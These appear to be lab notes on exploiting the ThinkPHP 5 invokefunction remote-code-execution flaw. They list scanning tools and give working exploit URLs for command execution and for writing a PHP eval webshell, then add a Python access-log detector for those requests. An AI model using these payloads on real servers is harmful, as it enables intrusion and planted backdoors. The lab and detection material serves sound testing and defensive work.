nuclei ✅
nuclei -tags thinkphp -u http://192.168.229.140:8080/
xray ✅
thinkphp_scan ✅
Project: https://github.com/anx0ing/thinkphp_scan
ThinkphpRCE ✅
Project: https://github.com/sukabuliet/ThinkphpRCE
蓝鲸 (Blue Whale) ✅
Project: https://github.com/bewhale/thinkphp_gui_tools
莲花 (Lotus) ✅
Project: https://github.com/Lotus6/ThinkphpGUI
Tried command execution with it, but got no result.
Thinkphp全网GUI圈子社区专版 (ThinkPHP GUI, community edition) ✅
Vulnerability verification & exploitation
Visiting the following address directly executes phpinfo:
http://192.168.229.140:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
Arbitrary code execution
http://192.168.229.140:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Writing a webshell
http://192.168.229.140:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<URL-encoded content of the file to write>
URL-encoding `<?php phpinfo(); eval(@$_POST['cmd']); ?>` gives:
http://192.168.229.140:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20phpinfo()%3B%20eval(%40%24_POST%5B'cmd'%5D)%3B%20%3F%3E
Visit the backdoor address; it looks like the file was written successfully.
Connect to the backdoor
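Added example (not from the original page or any of the tools listed): a Python detector that flags the ThinkPHP 5 invokefunction requests shown above when they appear in web-server access logs, URL-decoding the target so encoded variants are caught and classifying the impact from the callable passed in vars[0]. The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in combined access-log format (not from the original page).
SAMPLE_LOG = [
    r'10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1" 200 512',
    r'10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20eval(%40%24_POST%5B%27cmd%27%5D)%3B%20%3F%3E HTTP/1.1" 200 12',
    r'10.0.0.6 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 2048',
    r'10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /index.php?s=%2Findex%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 64',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# The route used by the exploit URLs: the think\app controller reached through the "s" parameter.
ROUTE_RE = re.compile(r"think[\\/]app[\\/]invokefunction")

# What the callable passed in vars[0] tells a responder about the attacker's goal.
IMPACT = {
    "system": "command execution", "exec": "command execution",
    "shell_exec": "command execution", "passthru": "command execution",
    "file_put_contents": "webshell write", "phpinfo": "reconnaissance",
}

def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse_line(line: str):
    """Return a finding for a ThinkPHP 5 invokefunction request, else None."""
    m = LOG_RE.match(line)
    if not m or not ROUTE_RE.search(fully_decode(m.group("target")).lower()):
        return None
    params = parse_qs(m.group("target").partition("?")[2], keep_blank_values=True)
    callable_name = fully_decode(params.get("vars[0]", [""])[0]).lower()
    return {
        "ip": m.group("ip"), "time": m.group("time"), "status": int(m.group("status")),
        "function": params.get("function", [""])[0],
        "callable": callable_name,
        "impact": IMPACT.get(callable_name, "unrecognised callable"),
        "args": [fully_decode(a) for a in params.get("vars[1][]", [])],
    }

def scan(lines):
    """Run analyse_line over every log line and keep the hits."""
    return [f for f in map(analyse_line, lines) if f]
```

Running `scan(SAMPLE_LOG)` yields three findings (reconnaissance, webshell write with the decoded PHP body in `args`, command execution) and ignores the ordinary login request.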